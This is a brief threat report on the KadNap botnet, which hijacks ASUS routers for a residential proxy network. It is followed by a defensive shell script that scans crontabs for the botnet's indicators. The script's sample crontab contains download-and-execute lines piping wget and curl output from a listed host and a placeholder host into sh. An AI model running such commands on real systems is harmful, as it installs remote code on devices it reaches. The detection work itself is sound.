
KadNap Botnet Converts ASUS Routers into a Global Residential Proxy Network
KadNap, a new botnet, hijacks ASUS routers and other edge devices to form a peer-to-peer proxy network for malicious traffic. By August 2025 it controlled about 14,000 devices. It uses a custom Kademlia DHT to locate its C2s, a design meant to decentralize control, but two fixed nodes connect to the C2s early, which undermines that decentralization to some extent and aids takedowns.

Infections start by pulling aic.sh from 212.104.141.140, establish persistence via a cron job that runs every 55 minutes, and install an ELF payload named kad.

The botnet is linked to the Doppelganger proxy service, which rents infected devices as residential proxies for DDoS, credential stuffing, and brute-force campaigns. Lumen has blocked KadNap traffic on its network and will publish IOCs to help others disrupt the botnet.
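
The cron-based persistence described above leaves a trace that can be checked on a device or in a collected crontab. The script below is an added triage example, not code from the report or from Lumen: it flags cron entries that contain the page's indicators (212.104.141.140, aic.sh) or that pair a 55-minute schedule with a download. The minute-field forms (`55`, `*/55`), the wget/curl match, the sample crontab and the helper names `scan_cron`, `count_hits` and `write_sample` are assumptions.

```shell
#!/bin/sh
# Added triage example, not code from the original report.
# From the page: fetch host 212.104.141.140, script aic.sh, 55-minute cron job.
KADNAP_IP='212.104.141.140'
KADNAP_SCRIPT='aic.sh'

# scan_cron FILE: print "reasons<TAB>entry" for every suspicious cron entry.
scan_cron() {
    awk -v ip="$KADNAP_IP" -v script="$KADNAP_SCRIPT" '
        /^[ \t]*(#|$)/ { next }                   # skip comments and blank lines
        {
            hard = ""; soft = 0
            if (index($0, ip))     hard = hard "known-ip,"
            if (index($0, script)) hard = hard "known-script,"
            # Assumption: the 55-minute job shows up as minute field 55 or */55.
            sched = ($1 == "55" || $1 == "*/55")
            # Assumption: the download uses wget or curl.
            fetch = ($0 ~ /(wget|curl)[ \t]/)
            # A schedule match alone is weak; require a download alongside it.
            if (sched && fetch) soft = 1
            if (hard != "" || soft) {
                r = hard (sched ? "sched55," : "") (fetch ? "fetch," : "")
                sub(/,$/, "", r)
                printf "%s\t%s\n", r, $0
            }
        }' "$1"
}

# count_hits FILE: number of flagged entries (0 when the file is clean).
count_hits() { scan_cron "$1" | awk 'END { print NR }'; }

# Constructed sample crontab (not captured from a device); URL paths are placeholders.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample
*/5 * * * * /usr/sbin/ntpclient -s
55 * * * * wget -q -O - http://212.104.141.140/PLACEHOLDER/aic.sh | sh
30 2 * * * /jffs/scripts/backup.sh
*/55 * * * * curl -s http://192.0.2.10/PLACEHOLDER | sh
55 3 * * * /opt/bin/rotate-logs
EOF
}

# Usage: sh script.sh /path/to/crontab
if [ "${1:-}" ]; then scan_cron "$1"; fi
```

A page indicator flags an entry on its own, while a 55-minute schedule is reported only when the same entry also downloads something, which keeps ordinary jobs that happen to run at minute 55 out of the results.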